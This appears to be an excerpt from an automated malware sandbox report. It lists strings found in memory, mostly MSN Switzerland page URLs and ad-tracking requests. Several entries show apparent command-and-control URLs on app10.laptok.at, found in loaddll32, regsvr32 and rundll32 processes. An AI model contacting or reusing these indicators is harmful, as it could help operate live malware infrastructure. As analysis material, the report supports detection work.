Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.6.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: {F1E5E2AE-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://app10.laptok.at/KiETfhAdcEl7/hLoS0_2BEdS/nu4Yf9GnANVyXk/YgUltJ7zs6xEJ2nloxeBs/eATUXgJAO922Gcg
Source: {F1E5E2AC-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr, ~DF089A6B92B8B468A8.TMP.4.dr	String found in binary or memory: http://app10.laptok.at/PdcGcGQosorY2QVhs_2/Bq9ScRQL0MmNo2gJrOrbiG/FDPb27Vu9hQGu/uY_2BMGI/NhNPnwzZnvY
Source: loaddll32.exe, 00000000.00000003.862593152.0000000001258000.00000004.00000001.sdmp, ~DFBF4FFB19552D8CDC.TMP.4.dr, {E5354AB5-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://app10.laptok.at/iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbI
Source: loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp	String found in binary or memory: http://app10.laptok.at/tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6
Source: {078013E1-2776-11EC-90EB-ECF4BBEA1588}.dat.4.dr, ~DFF3589949295E4D6F.TMP.4.dr	String found in binary or memory: http://app10.laptok.at/tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6PN/mY
Source: de-ch[1].htm.6.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.6.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: auction[1].htm.6.dr	String found in binary or memory: http://popup.taboola.com/german
Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.4.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.4.dr	String found in binary or memory: http://www.google.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.4.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.4.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.4.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.4.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.4.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.4.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.6.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692
Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: https://contextualtag.media.net
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: auction[1].htm.6.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1633614702&rver=7.0.6730.0&am
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1633614703&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1633614702&rver=7.0.6730.0&w
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://outlook.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://secure.adnxs.com/clktrb?id=762232
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: imagestore.dat.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAPaLRV.img?h=368&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://twitter.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/finanzen/nachrichten/schweizer-arbeitsmarkt-auf-dem-weg-zum-vorkrisennivea
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/schweiz/bund-registriert-erneut-weniger-neue-corona-ansteckung
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/apps-bieten-nur-oberfl%c3%a4chlichen-zugang-zum-gegen%c3%bcber/
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/auto-nach-unfall-mit-milit%c3%a4rblachen-abgedeckt/ar-AALgoO8?o
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/die-araberinnen-und-araber-kehren-zur%c3%bcck/ar-AAPbaLO?ocid=h
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/gericht-verurteilt-mehrfachen-raser-zu-30-monaten-freiheitsstra
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/mann-54-wird-von-wurzelstock-getroffen-und-kommt-ums-leben/ar-A
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/schulleitung-warnt-eltern-vor-lebensbedrohlichem-ohnmacht-spiel
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/spezialisten-suchen-mit-sonarsonde-in-200-metern-tiefe-nach-ver
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/was-passierte-nur-drei-minuten-nach-dem-start/ar-AAP7LCM?ocid=h
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skype.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/de
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: global traffic	HTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Accept: application/javascript, /;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: geolocation.onetrust.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1Accept: application/javascript, /;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: btloader.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /px.gif?ch=1&e=0.8749585328117704 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad-delivery.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad.doubleclick.netConnection: Keep-AliveCookie: IDE=AHWqTUmYUECPaufv9uO9HoZuaxRLSg5dGz_-QhiA_NR2P4lElZyv3fzE7AZa07XP
Source: global traffic	HTTP traffic detected: GET /pixel?cs=1&google_nid=media&google_cm=1&google_hm=Mjc2NjE2MzExNjY4NDE2ODAwMFYxMA%3D%3D&google_sc=1 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cm.g.doubleclick.netConnection: Keep-AliveCookie: IDE=AHWqTUmYUECPaufv9uO9HoZuaxRLSg5dGz_-QhiA_NR2P4lElZyv3fzE7AZa07XP
Source: global traffic	HTTP traffic detected: GET /sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: x.bidswitch.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ul_cb/sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: x.bidswitch.netConnection: Keep-AliveCookie: tuuid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; c=1633614712; tuuid_lu=1633614712
Source: global traffic	HTTP traffic detected: GET /710489.gif HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: id.rlcdn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /track/cmf/generic?ttd_pid=8m33zk4&ttd_tpi=1 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: match.adsrvr.orgConnection: Keep-Alive
